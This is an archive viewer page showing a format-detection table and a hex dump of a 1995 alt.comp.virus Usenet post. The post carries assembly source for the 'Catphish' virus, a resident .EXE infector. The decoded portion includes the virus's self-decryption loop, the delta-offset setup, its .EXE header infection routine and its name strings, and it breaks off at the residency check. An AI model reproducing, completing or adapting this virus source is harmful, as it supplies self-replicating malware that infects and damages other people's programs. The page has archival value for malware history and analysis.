home *** CD-ROM | disk | FTP | other *** search
open in: 
MacOS 8.1
|
Win98
|
DOS
view JSON data
|
view as text
This file was processed as: Mailbox/MIME Entity
(archive/mbox).
You can browse this item here: CATPHISH.ASM
| Confidence | Program | Detection | Match Type | Support
|
|---|
| 100%
| dexvert
| Mailbox/MIME Entity (archive/mbox)
| magic
| Supported |
| 100%
| dexvert
| Internet Message Format (text/imf)
| magic
| Supported |
| 100%
| dexvert
| Assembly Source File (text/asm)
| magic
| Supported |
| 1%
| dexvert
| Text File (text/txt)
| fallback
| Supported |
| 100%
| file
| Mailbox text, 1st line "From smtp Sun Jan 29 16:25 EST 1995", ISO-8859 text
| default
| |
| 100%
| TrID
| E-Mail message (Var. 2)
| default
| |
| 100%
| perlTextCheck
| Likely Text (Perl)
| default
| |
| 100%
| siegfried
| x-fmt/111 Plain Text File
| default
| |
| 100%
| detectItEasy
| Format: plain text[LF]
| default (weak)
| |
| 100%
| xdgMime
| application/mbox
| default
|
|
hex view+--------+-------------------------+-------------------------+--------+--------+
|00000000| 46 72 6f 6d 20 73 6d 74 | 70 20 53 75 6e 20 4a 61 |From smt|p Sun Ja|
|00000010| 6e 20 32 39 20 31 36 3a | 32 35 20 45 53 54 20 31 |n 29 16:|25 EST 1|
|00000020| 39 39 35 0a 52 65 63 65 | 69 76 65 64 3a 20 66 72 |995.Rece|ived: fr|
|00000030| 6f 6d 20 69 64 73 2e 6e | 65 74 20 62 79 20 50 4f |om ids.n|et by PO|
|00000040| 42 4f 58 2e 6a 77 75 2e | 65 64 75 3b 20 53 75 6e |BOX.jwu.|edu; Sun|
|00000050| 2c 20 32 39 20 4a 61 6e | 20 39 35 20 31 36 3a 32 |, 29 Jan| 95 16:2|
|00000060| 35 20 45 53 54 0a 44 61 | 74 65 3a 20 53 75 6e 2c |5 EST.Da|te: Sun,|
|00000070| 20 32 39 20 4a 61 6e 20 | 31 39 39 35 20 31 36 3a | 29 Jan |1995 16:|
|00000080| 31 38 3a 35 32 20 2d 30 | 35 30 30 20 28 45 53 54 |18:52 -0|500 (EST|
|00000090| 29 0a 46 72 6f 6d 3a 20 | 69 64 73 2e 6e 65 74 21 |).From: |ids.net!|
|000000a0| 4a 4f 53 48 55 41 57 20 | 28 4a 4f 53 48 55 41 57 |JOSHUAW |(JOSHUAW|
|000000b0| 29 0a 54 6f 3a 20 70 6f | 62 6f 78 2e 6a 77 75 2e |).To: po|box.jwu.|
|000000c0| 65 64 75 21 6a 6f 73 68 | 75 61 77 20 0a 43 6f 6e |edu!josh|uaw .Con|
|000000d0| 74 65 6e 74 2d 4c 65 6e | 67 74 68 3a 20 31 31 38 |tent-Len|gth: 118|
|000000e0| 37 34 0a 43 6f 6e 74 65 | 6e 74 2d 54 79 70 65 3a |74.Conte|nt-Type:|
|000000f0| 20 74 65 78 74 0a 4d 65 | 73 73 61 67 65 2d 49 64 | text.Me|ssage-Id|
|00000100| 3a 20 3c 39 35 30 31 32 | 39 31 36 31 38 35 32 2e |: <95012|9161852.|
|00000110| 31 30 30 37 34 40 69 64 | 73 2e 6e 65 74 3e 0a 53 |10074@id|s.net>.S|
|00000120| 74 61 74 75 73 3a 20 52 | 4f 0a 0a 54 6f 3a 20 6a |tatus: R|O..To: j|
|00000130| 6f 73 68 75 61 77 40 70 | 6f 62 6f 78 2e 6a 77 75 |oshuaw@p|obox.jwu|
|00000140| 2e 65 64 75 0a 53 75 62 | 6a 65 63 74 3a 20 28 66 |.edu.Sub|ject: (f|
|00000150| 77 64 29 20 43 41 54 50 | 48 49 53 48 2e 41 53 4d |wd) CATP|HISH.ASM|
|00000160| 0a 4e 65 77 73 67 72 6f | 75 70 73 3a 20 61 6c 74 |.Newsgro|ups: alt|
|00000170| 2e 63 6f 6d 70 2e 76 69 | 72 75 73 0a 0a 50 61 74 |.comp.vi|rus..Pat|
|00000180| 68 3a 20 70 61 70 65 72 | 62 6f 79 2e 69 64 73 2e |h: paper|boy.ids.|
|00000190| 6e 65 74 21 75 75 6e 65 | 74 21 63 73 2e 75 74 65 |net!uune|t!cs.ute|
|000001a0| 78 61 73 2e 65 64 75 21 | 75 77 6d 2e 65 64 75 21 |xas.edu!|uwm.edu!|
|000001b0| 6d 73 75 6e 65 77 73 21 | 6e 65 77 73 2e 6d 74 75 |msunews!|news.mtu|
|000001c0| 2e 65 64 75 21 6e 65 77 | 73 2e 6d 74 75 2e 65 64 |.edu!new|s.mtu.ed|
|000001d0| 75 21 6e 6f 74 2d 66 6f | 72 2d 6d 61 69 6c 0a 46 |u!not-fo|r-mail.F|
|000001e0| 72 6f 6d 3a 20 6a 64 6d | 61 74 68 65 77 40 6d 74 |rom: jdm|athew@mt|
|000001f0| 75 2e 65 64 75 20 28 49 | 63 65 70 69 63 6b 29 0a |u.edu (I|cepick).|
|00000200| 4e 65 77 73 67 72 6f 75 | 70 73 3a 20 61 6c 74 2e |Newsgrou|ps: alt.|
|00000210| 63 6f 6d 70 2e 76 69 72 | 75 73 0a 53 75 62 6a 65 |comp.vir|us.Subje|
|00000220| 63 74 3a 20 43 41 54 50 | 48 49 53 48 2e 41 53 4d |ct: CATP|HISH.ASM|
|00000230| 0a 44 61 74 65 3a 20 32 | 36 20 4a 61 6e 20 31 39 |.Date: 2|6 Jan 19|
|00000240| 39 35 20 31 33 3a 30 36 | 3a 31 35 20 2d 30 35 30 |95 13:06|:15 -050|
|00000250| 30 0a 4f 72 67 61 6e 69 | 7a 61 74 69 6f 6e 3a 20 |0.Organi|zation: |
|00000260| 4d 69 63 68 69 67 61 6e | 20 54 65 63 68 6e 6f 6c |Michigan| Technol|
|00000270| 6f 67 69 63 61 6c 20 55 | 6e 69 76 65 72 73 69 74 |ogical U|niversit|
|00000280| 79 0a 4c 69 6e 65 73 3a | 20 34 38 36 0a 4d 65 73 |y.Lines:| 486.Mes|
|00000290| 73 61 67 65 2d 49 44 3a | 20 3c 33 67 38 6f 61 6e |sage-ID:| <3g8oan|
|000002a0| 24 35 34 67 40 6d 61 78 | 77 65 6c 6c 31 31 2e 65 |$54g@max|well11.e|
|000002b0| 65 3e 0a 4e 4e 54 50 2d | 50 6f 73 74 69 6e 67 2d |e>.NNTP-|Posting-|
|000002c0| 48 6f 73 74 3a 20 6d 61 | 78 77 65 6c 6c 31 31 2e |Host: ma|xwell11.|
|000002d0| 65 65 2e 6d 74 75 2e 65 | 64 75 0a 58 2d 4e 65 77 |ee.mtu.e|du.X-New|
|000002e0| 73 72 65 61 64 65 72 3a | 20 54 49 4e 20 5b 76 65 |sreader:| TIN [ve|
|000002f0| 72 73 69 6f 6e 20 31 2e | 32 20 50 4c 31 5d 0a 0a |rsion 1.|2 PL1]..|
|00000300| 0a 0a 6e 61 6d 65 20 20 | 20 20 56 49 52 55 53 54 |..name | VIRUST|
|00000310| 45 53 54 0a 20 20 20 20 | 20 20 20 20 74 69 74 6c |EST. | titl|
|00000320| 65 0a 63 6f 64 65 20 20 | 20 20 73 65 67 6d 65 6e |e.code | segmen|
|00000330| 74 0a 20 20 20 20 20 20 | 20 20 61 73 73 75 6d 65 |t. | assume|
|00000340| 20 20 63 73 3a 63 6f 64 | 65 2c 20 64 73 3a 63 6f | cs:cod|e, ds:co|
|00000350| 64 65 2c 20 65 73 3a 63 | 6f 64 65 0a 20 20 20 20 |de, es:c|ode. |
|00000360| 20 20 20 20 6f 72 67 20 | 20 20 20 20 31 30 30 68 | org | 100h|
|00000370| 0a 0a 3b 2d 2b 2d 2b 2d | 2b 2d 2b 2d 2b 2d 2b 2d |..;-+-+-|+-+-+-+-|
|00000380| 2b 2d 2b 2d 2b 2d 2b 2d | 2b 2d 2b 2d 2b 2d 2b 2d |+-+-+-+-|+-+-+-+-|
|00000390| 2b 2d 2b 2d 2b 2d 2b 2d | 2b 2d 2b 2d 2b 2d 2b 2d |+-+-+-+-|+-+-+-+-|
|000003a0| 2b 2d 2b 2d 2b 2d 2b 2d | 2b 2d 2b 2d 2b 2d 2b 2d |+-+-+-+-|+-+-+-+-|
|000003b0| 2b 2d 2b 2d 2b 2d 2b 2d | 2b 2d 2b 2d 2b 2d 2b 0a |+-+-+-+-|+-+-+-+.|
|000003c0| 3b 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 |; | |
|000003d0| 20 20 20 20 20 20 20 20 | 20 54 68 65 20 43 61 74 | | The Cat|
|000003e0| 70 68 69 73 68 20 56 69 | 72 75 73 2e 0a 3b 0a 3b |phish Vi|rus..;.;|
|000003f0| 20 20 20 54 68 65 20 43 | 61 74 70 68 69 73 68 20 | The C|atphish |
|00000400| 76 69 72 75 73 20 69 73 | 20 61 20 72 65 73 69 64 |virus is| a resid|
|00000410| 65 6e 74 20 2e 45 58 45 | 20 69 6e 66 65 63 74 6f |ent .EXE| infecto|
|00000420| 72 2e 0a 3b 20 20 20 20 | 20 20 20 20 20 20 20 20 |r..; | |
|00000430| 20 20 20 20 53 69 7a 65 | 3a 20 36 37 38 20 62 79 | Size|: 678 by|
|00000440| 74 65 73 20 28 64 65 63 | 69 6d 61 6c 29 2e 0a 3b |tes (dec|imal)..;|
|00000450| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000460| 4e 6f 20 61 63 74 69 76 | 61 74 69 6f 6e 20 28 62 |No activ|ation (b|
|00000470| 6f 6d 62 29 2e 0a 3b 20 | 20 20 20 20 20 20 20 20 |omb)..; | |
|00000480| 20 20 20 20 20 20 20 53 | 61 76 65 73 20 64 61 74 | S|aves dat|
|00000490| 65 20 61 6e 64 20 66 69 | 6c 65 20 61 74 74 72 69 |e and fi|le attri|
|000004a0| 62 75 74 65 73 2e 0a 3b | 0a 3b 20 20 20 20 20 20 |butes..;|.; |
|000004b0| 20 20 20 49 66 20 61 73 | 73 65 6d 62 6c 69 6e 67 | If as|sembling|
|000004c0| 2c 20 63 68 65 63 6b 5f | 69 66 5f 72 65 73 69 64 |, check_|if_resid|
|000004d0| 65 6e 74 20 6a 75 6d 70 | 20 6d 75 73 74 20 62 65 |ent jump| must be|
|000004e0| 20 6d 61 72 6b 65 64 20 | 6f 76 65 72 0a 3b 20 20 | marked |over.; |
|000004f0| 20 20 20 20 20 20 20 20 | 20 77 69 74 68 20 6e 6f | | with no|
|00000500| 70 20 61 66 74 65 72 20 | 66 69 72 73 74 20 65 78 |p after |first ex|
|00000510| 65 63 75 74 69 6f 6e 20 | 28 66 69 72 73 74 20 65 |ecution |(first e|
|00000520| 78 65 63 75 74 69 6f 6e | 20 77 69 6c 6c 20 68 61 |xecution| will ha|
|00000530| 6e 67 0a 3b 20 20 20 20 | 20 20 20 20 20 20 20 73 |ng.; | s|
|00000540| 79 73 74 65 6d 29 2e 0a | 3b 0a 3b 20 20 20 20 20 |ystem)..|;.; |
|00000550| 20 20 20 20 2a 2a 2a 20 | 53 6f 75 72 63 65 20 69 | *** |Source i|
|00000560| 73 20 6d 61 64 65 20 61 | 76 61 69 6c 61 62 6c 65 |s made a|vailable|
|00000570| 20 74 6f 20 6c 65 61 72 | 6e 20 66 72 6f 6d 2c 20 | to lear|n from, |
|00000580| 6e 6f 74 20 74 6f 0a 3b | 20 20 20 20 20 20 20 20 |not to.;| |
|00000590| 20 20 20 20 20 20 20 63 | 68 61 6e 67 65 20 61 75 | c|hange au|
|000005a0| 74 68 6f 72 27 73 20 6e | 61 6d 65 20 61 6e 64 20 |thor's n|ame and |
|000005b0| 63 6c 61 69 6d 20 63 72 | 65 64 69 74 21 20 2a 2a |claim cr|edit! **|
|000005c0| 2a 0a 0a 73 74 61 72 74 | 3a 0a 20 20 20 20 20 20 |*..start|:. |
|000005d0| 20 20 63 61 6c 6c 20 20 | 20 20 73 65 74 75 70 20 | call | setup |
|000005e0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000005f0| 20 20 20 20 20 20 20 20 | 20 20 20 20 3b 20 46 69 | | ; Fi|
|00000600| 6e 64 20 22 64 65 6c 74 | 61 20 6f 66 66 73 65 74 |nd "delt|a offset|
|00000610| 22 2e 0a 73 65 74 75 70 | 3a 0a 20 20 20 20 20 20 |"..setup|:. |
|00000620| 20 20 70 6f 70 20 20 20 | 20 20 62 70 0a 20 20 20 | pop | bp. |
|00000630| 20 20 20 20 20 73 75 62 | 20 20 20 20 20 62 70 2c | sub| bp,|
|00000640| 20 6f 66 66 73 65 74 20 | 73 65 74 75 70 2d 31 30 | offset |setup-10|
|00000650| 30 68 0a 20 20 20 20 20 | 20 20 20 6a 6d 70 20 20 |0h. | jmp |
|00000660| 20 20 20 63 68 65 63 6b | 5f 69 66 5f 72 65 73 69 | check|_if_resi|
|00000670| 64 65 6e 74 20 20 20 20 | 20 20 20 20 20 20 20 20 |dent | |
|00000680| 20 20 20 20 20 3b 20 53 | 65 65 20 6e 6f 74 65 20 | ; S|ee note |
|00000690| 61 62 6f 76 65 20 61 62 | 6f 75 74 20 6a 6d 70 21 |above ab|out jmp!|
|000006a0| 0a 0a 70 72 65 5f 64 65 | 63 5f 65 6d 3a 0a 20 20 |..pre_de|c_em:. |
|000006b0| 20 20 20 20 20 20 6d 6f | 76 20 62 78 2c 6f 66 66 | mo|v bx,off|
|000006c0| 73 65 74 20 69 6e 66 65 | 63 74 5f 68 65 61 64 65 |set infe|ct_heade|
|000006d0| 72 2d 31 30 30 68 0a 20 | 20 20 20 20 20 20 20 61 |r-100h. | a|
|000006e0| 64 64 20 62 78 2c 62 70 | 0a 20 20 20 20 20 20 20 |dd bx,bp|. |
|000006f0| 20 6d 6f 76 20 63 78 2c | 65 6e 64 63 72 79 70 74 | mov cx,|endcrypt|
|00000700| 2d 69 6e 66 65 63 74 5f | 68 65 61 64 65 72 0a 0a |-infect_|header..|
|00000710| 72 6f 72 5f 65 6d 3a 0a | 20 20 20 20 20 20 20 20 |ror_em:.| |
|00000720| 6d 6f 76 20 64 6c 2c 62 | 79 74 65 20 70 74 72 20 |mov dl,b|yte ptr |
|00000730| 63 73 3a 5b 62 78 5d 0a | 20 20 20 20 20 20 20 20 |cs:[bx].| |
|00000740| 72 6f 72 20 64 6c 2c 31 | 20 20 20 20 20 20 20 20 |ror dl,1| |
|00000750| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000760| 20 20 20 20 20 20 20 20 | 20 20 3b 20 44 65 63 72 | | ; Decr|
|00000770| 79 70 74 20 76 69 72 75 | 73 20 63 6f 64 65 0a 20 |ypt viru|s code. |
|00000780| 20 20 20 20 20 20 20 6d | 6f 76 20 62 79 74 65 20 | m|ov byte |
|00000790| 70 74 72 20 63 73 3a 5b | 62 78 5d 2c 64 6c 20 20 |ptr cs:[|bx],dl |
|000007a0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000007b0| 20 3b 20 20 20 62 79 20 | 72 6f 74 61 74 69 6e 67 | ; by |rotating|
|000007c0| 20 72 69 67 68 74 2e 0a | 20 20 20 20 20 20 20 20 | right..| |
|000007d0| 69 6e 63 20 62 78 0a 20 | 20 20 20 20 20 20 20 6c |inc bx. | l|
|000007e0| 6f 6f 70 20 72 6f 72 5f | 65 6d 0a 0a 20 20 20 20 |oop ror_|em.. |
|000007f0| 20 20 20 20 6a 6d 70 20 | 63 68 65 63 6b 5f 69 66 | jmp |check_if|
|00000800| 5f 72 65 73 69 64 65 6e | 74 0a 0a 3b 2d 2d 2d 2d |_residen|t..;----|
|00000810| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00000820| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 20 49 6e |--------|----- In|
|00000830| 66 65 63 74 20 2e 45 58 | 45 20 68 65 61 64 65 72 |fect .EX|E header|
|00000840| 20 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d | -------|--------|
|00000850| 2d 2d 2d 2d 2d 2d 2d 2d | 0a 3b 20 20 20 54 68 65 |--------|.; The|
|00000860| 20 2e 45 58 45 20 68 65 | 61 64 65 72 20 6d 6f 64 | .EXE he|ader mod|
|00000870| 69 66 79 69 6e 67 20 63 | 6f 64 65 20 62 65 6c 6f |ifying c|ode belo|
|00000880| 77 20 69 73 20 6d 79 20 | 72 65 77 6f 72 6b 65 64 |w is my |reworked|
|00000890| 20 76 65 72 73 69 6f 6e | 20 6f 66 0a 3b 20 20 20 | version| of.; |
|000008a0| 20 20 44 61 72 6b 20 41 | 6e 67 65 6c 27 73 20 63 | Dark A|ngel's c|
|000008b0| 6f 64 65 20 66 6f 75 6e | 64 20 69 6e 20 68 69 73 |ode foun|d in his|
|000008c0| 20 50 68 61 6c 63 6f 6e | 2f 53 6b 69 73 6d 20 76 | Phalcon|/Skism v|
|000008d0| 69 72 75 73 20 67 75 69 | 64 65 73 2e 0a 0a 0a 69 |irus gui|des....i|
|000008e0| 6e 66 65 63 74 5f 68 65 | 61 64 65 72 3a 0a 20 20 |nfect_he|ader:. |
|000008f0| 20 20 20 20 20 20 20 20 | 70 75 73 68 20 62 78 0a | |push bx.|
|00000900| 20 20 20 20 20 20 20 20 | 20 20 70 75 73 68 20 64 | | push d|
|00000910| 78 0a 20 20 20 20 20 20 | 20 20 20 20 70 75 73 68 |x. | push|
|00000920| 20 61 78 0a 0a 0a 0a 20 | 20 20 20 20 20 20 20 20 | ax.... | |
|00000930| 20 6d 6f 76 20 20 20 20 | 20 62 78 2c 20 77 6f 72 | mov | bx, wor|
|00000940| 64 20 70 74 72 20 5b 62 | 75 66 66 65 72 2b 38 2d |d ptr [b|uffer+8-|
|00000950| 31 30 30 68 5d 20 20 20 | 20 3b 20 48 65 61 64 65 |100h] | ; Heade|
|00000960| 72 20 73 69 7a 65 20 69 | 6e 20 70 61 72 61 67 72 |r size i|n paragr|
|00000970| 61 70 68 73 0a 20 20 20 | 20 20 20 20 20 20 20 20 |aphs. | |
|00000980| 20 20 20 20 3b 20 20 5e | 2d 2d 2d 6d 61 6b 65 20 | ; ^|---make |
|00000990| 73 75 72 65 20 79 6f 75 | 20 64 6f 6e 27 74 20 64 |sure you| don't d|
|000009a0| 65 73 74 72 6f 79 20 74 | 68 65 20 66 69 6c 65 20 |estroy t|he file |
|000009b0| 68 61 6e 64 6c 65 0a 20 | 20 20 20 20 20 20 20 20 |handle. | |
|000009c0| 20 6d 6f 76 20 20 20 20 | 20 63 6c 2c 20 34 20 20 | mov | cl, 4 |
|000009d0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|000009e0| 20 20 20 20 20 20 20 20 | 20 3b 20 4d 75 6c 74 69 | | ; Multi|
|000009f0| 70 6c 79 20 62 79 20 31 | 36 2e 20 20 57 6f 6e 27 |ply by 1|6. Won'|
|00000a00| 74 0a 20 20 20 20 20 20 | 20 20 20 20 73 68 6c 20 |t. | shl |
|00000a10| 20 20 20 20 62 78 2c 20 | 63 6c 20 20 20 20 20 20 | bx, |cl |
|00000a20| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000a30| 20 20 20 20 3b 20 77 6f | 72 6b 20 77 69 74 68 20 | ; wo|rk with |
|00000a40| 68 65 61 64 65 72 73 20 | 3e 20 34 30 39 36 0a 20 |headers |> 4096. |
|00000a50| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000a60| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000a70| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000a80| 20 3b 20 62 79 74 65 73 | 2e 20 20 4f 68 20 77 65 | ; bytes|. Oh we|
|00000a90| 6c 6c 21 0a 20 20 20 20 | 20 20 20 20 20 20 73 75 |ll!. | su|
|00000aa0| 62 20 20 20 20 20 61 78 | 2c 20 62 78 20 20 20 20 |b ax|, bx |
|00000ab0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000ac0| 20 20 20 20 20 20 3b 20 | 53 75 62 74 72 61 63 74 | ; |Subtract|
|00000ad0| 20 68 65 61 64 65 72 20 | 73 69 7a 65 20 66 72 6f | header |size fro|
|00000ae0| 6d 0a 20 20 20 20 20 20 | 20 20 20 20 73 62 62 20 |m. | sbb |
|00000af0| 20 20 20 20 64 78 2c 20 | 30 20 20 20 20 20 20 20 | dx, |0 |
|00000b00| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000b10| 20 20 20 20 3b 20 66 69 | 6c 65 20 73 69 7a 65 0a | ; fi|le size.|
|00000b20| 20 20 20 20 3b 20 4e 6f | 77 20 44 58 3a 41 58 20 | ; No|w DX:AX |
|00000b30| 69 73 20 6c 6f 61 64 65 | 64 20 77 69 74 68 20 66 |is loade|d with f|
|00000b40| 69 6c 65 20 73 69 7a 65 | 20 6d 69 6e 75 73 20 68 |ile size| minus h|
|00000b50| 65 61 64 65 72 20 73 69 | 7a 65 0a 20 20 20 20 20 |eader si|ze. |
|00000b60| 20 20 20 20 20 6d 6f 76 | 20 20 20 20 20 63 78 2c | mov| cx,|
|00000b70| 20 31 30 68 20 20 20 20 | 20 20 20 20 20 20 20 20 | 10h | |
|00000b80| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 3b 20 44 | | ; D|
|00000b90| 58 3a 41 58 2f 43 58 20 | 3d 20 41 58 20 52 65 6d |X:AX/CX |= AX Rem|
|00000ba0| 61 69 6e 64 65 72 20 44 | 58 0a 20 20 20 20 20 20 |ainder D|X. |
|00000bb0| 20 20 20 20 64 69 76 20 | 20 20 20 20 63 78 0a 0a | div | cx..|
|00000bc0| 0a 20 20 20 20 20 20 20 | 20 20 20 6d 6f 76 20 20 |. | mov |
|00000bd0| 20 20 20 77 6f 72 64 20 | 70 74 72 20 5b 62 75 66 | word |ptr [buf|
|00000be0| 66 65 72 2b 31 34 68 2d | 31 30 30 68 5d 2c 20 64 |fer+14h-|100h], d|
|00000bf0| 78 20 20 3b 20 49 50 20 | 4f 66 66 73 65 74 0a 20 |x ; IP |Offset. |
|00000c00| 20 20 20 20 20 20 20 20 | 20 6d 6f 76 20 20 20 20 | | mov |
|00000c10| 20 77 6f 72 64 20 70 74 | 72 20 5b 62 75 66 66 65 | word pt|r [buffe|
|00000c20| 72 2b 31 36 68 2d 31 30 | 30 68 5d 2c 20 61 78 20 |r+16h-10|0h], ax |
|00000c30| 20 3b 20 43 53 20 44 69 | 73 70 6c 61 63 65 6d 65 | ; CS Di|splaceme|
|00000c40| 6e 74 20 69 6e 20 6d 6f | 64 75 6c 65 0a 0a 0a 20 |nt in mo|dule... |
|00000c50| 20 20 20 20 20 20 20 20 | 20 6d 6f 76 20 20 20 20 | | mov |
|00000c60| 20 77 6f 72 64 20 70 74 | 72 20 5b 62 75 66 66 65 | word pt|r [buffe|
|00000c70| 72 2b 30 45 68 2d 31 30 | 30 68 5d 2c 20 61 78 20 |r+0Eh-10|0h], ax |
|00000c80| 20 20 20 20 3b 20 50 61 | 72 61 67 72 61 70 68 20 | ; Pa|ragraph |
|00000c90| 64 69 73 70 2e 20 53 53 | 0a 20 20 20 20 20 20 20 |disp. SS|. |
|00000ca0| 20 20 20 6d 6f 76 20 20 | 20 20 20 77 6f 72 64 20 | mov | word |
|00000cb0| 70 74 72 20 5b 62 75 66 | 66 65 72 2b 31 30 68 2d |ptr [buf|fer+10h-|
|00000cc0| 31 30 30 68 5d 2c 20 30 | 41 30 30 30 68 20 3b 20 |100h], 0|A000h ; |
|00000cd0| 53 74 61 72 74 69 6e 67 | 20 53 50 0a 0a 20 20 20 |Starting| SP.. |
|00000ce0| 20 20 20 20 20 20 20 70 | 6f 70 20 61 78 0a 20 20 | p|op ax. |
|00000cf0| 20 20 20 20 20 20 20 20 | 70 6f 70 20 64 78 0a 0a | |pop dx..|
|00000d00| 20 20 20 20 20 20 20 20 | 20 20 61 64 64 20 61 78 | | add ax|
|00000d10| 2c 20 65 6e 64 63 6f 64 | 65 2d 73 74 61 72 74 20 |, endcod|e-start |
|00000d20| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000d30| 20 20 3b 20 61 64 64 20 | 76 69 72 75 73 20 73 69 | ; add |virus si|
|00000d40| 7a 65 0a 20 20 20 20 20 | 20 20 20 20 20 63 6d 70 |ze. | cmp|
|00000d50| 20 61 78 2c 20 65 6e 64 | 63 6f 64 65 2d 73 74 61 | ax, end|code-sta|
|00000d60| 72 74 0a 20 20 20 20 20 | 20 20 20 20 20 6a 62 20 |rt. | jb |
|00000d70| 66 69 78 5f 66 61 75 6c | 74 0a 20 20 20 20 20 20 |fix_faul|t. |
|00000d80| 20 20 20 20 6a 6d 70 20 | 65 78 65 63 6f 6e 74 0a | jmp |execont.|
|00000d90| 0a 0a 77 61 72 5f 63 72 | 79 20 20 64 62 20 27 43 |..war_cr|y db 'C|
|00000da0| 72 79 20 48 61 76 6f 63 | 2c 20 61 6e 64 20 6c 65 |ry Havoc|, and le|
|00000db0| 74 20 73 6c 69 70 20 74 | 68 65 20 44 6f 67 73 20 |t slip t|he Dogs |
|00000dc0| 6f 66 20 57 61 72 21 27 | 2c 30 0a 76 5f 6e 61 6d |of War!'|,0.v_nam|
|00000dd0| 65 20 20 20 64 62 20 27 | 5b 43 61 74 70 68 69 73 |e db '|[Catphis|
|00000de0| 68 5d 27 2c 30 20 20 20 | 20 20 20 20 20 20 20 20 |h]',0 | |
|00000df0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 3b 20 56 | | ; V|
|00000e00| 69 72 75 73 20 6e 61 6d | 65 2e 0a 76 5f 61 75 74 |irus nam|e..v_aut|
|00000e10| 68 6f 72 20 64 62 20 27 | 46 69 72 73 74 53 74 72 |hor db '|FirstStr|
|00000e20| 69 6b 65 27 2c 30 20 20 | 20 20 20 20 20 20 20 20 |ike',0 | |
|00000e30| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 3b 20 4d | | ; M|
|00000e40| 65 2e 0a 76 5f 73 74 75 | 66 66 20 20 64 62 20 27 |e..v_stu|ff db '|
|00000e50| 4b 72 61 66 74 21 27 2c | 30 0a 0a 0a 66 69 78 5f |Kraft!',|0...fix_|
|00000e60| 66 61 75 6c 74 3a 0a 20 | 20 20 20 20 20 20 20 20 |fault:. | |
|00000e70| 20 61 64 64 20 64 78 2c | 31 64 0a 0a 65 78 65 63 | add dx,|1d..exec|
|00000e80| 6f 6e 74 3a 0a 20 20 20 | 20 20 20 20 20 20 20 70 |ont:. | p|
|00000e90| 75 73 68 20 61 78 0a 20 | 20 20 20 20 20 20 20 20 |ush ax. | |
|00000ea0| 20 6d 6f 76 20 63 6c 2c | 20 39 0a 20 20 20 20 20 | mov cl,| 9. |
|00000eb0| 20 20 20 20 20 73 68 72 | 20 61 78 2c 20 63 6c 0a | shr| ax, cl.|
|00000ec0| 20 20 20 20 20 20 20 20 | 20 20 72 6f 72 20 64 78 | | ror dx|
|00000ed0| 2c 20 63 6c 0a 20 20 20 | 20 20 20 20 20 20 20 73 |, cl. | s|
|00000ee0| 74 63 0a 0a 20 20 20 20 | 20 20 20 20 20 20 61 64 |tc.. | ad|
|00000ef0| 63 20 64 78 2c 20 61 78 | 0a 20 20 20 20 20 20 20 |c dx, ax|. |
|00000f00| 20 20 20 70 6f 70 20 61 | 78 0a 20 20 20 20 20 20 | pop a|x. |
|00000f10| 20 20 20 20 61 6e 64 20 | 61 68 2c 20 31 0a 0a 0a | and |ah, 1...|
|00000f20| 20 20 20 20 20 20 20 20 | 20 20 6d 6f 76 20 77 6f | | mov wo|
|00000f30| 72 64 20 70 74 72 20 5b | 62 75 66 66 65 72 2b 34 |rd ptr [|buffer+4|
|00000f40| 2d 31 30 30 68 5d 2c 20 | 64 78 20 20 20 20 20 20 |-100h], |dx |
|00000f50| 20 20 3b 20 46 69 78 2d | 75 70 20 74 68 65 20 66 | ; Fix-|up the f|
|00000f60| 69 6c 65 20 73 69 7a 65 | 20 69 6e 0a 20 20 20 20 |ile size| in. |
|00000f70| 20 20 20 20 20 20 6d 6f | 76 20 77 6f 72 64 20 70 | mo|v word p|
|00000f80| 74 72 20 5b 62 75 66 66 | 65 72 2b 32 2d 31 30 30 |tr [buff|er+2-100|
|00000f90| 68 5d 2c 20 61 78 20 20 | 20 20 20 20 20 20 3b 20 |h], ax | ; |
|00000fa0| 74 68 65 20 45 58 45 20 | 68 65 61 64 65 72 2e 0a |the EXE |header..|
|00000fb0| 0a 20 20 20 20 20 20 20 | 20 20 20 70 6f 70 20 62 |. | pop b|
|00000fc0| 78 0a 20 20 20 20 20 20 | 20 20 20 20 72 65 74 6e |x. | retn|
|00000fd0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000fe0| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00000ff0| 20 20 20 20 3b 20 4c 65 | 61 76 65 20 73 75 62 72 | ; Le|ave subr|
|00001000| 6f 75 74 69 6e 65 0a 0a | 3b 2d 2d 2d 2d 2d 2d 2d |outine..|;-------|
|00001010| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001020| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001030| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001040| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00001050| 2d 2d 2d 2d 2d 0a 0a 0a | 63 68 65 63 6b 5f 69 66 |-----...|check_if|
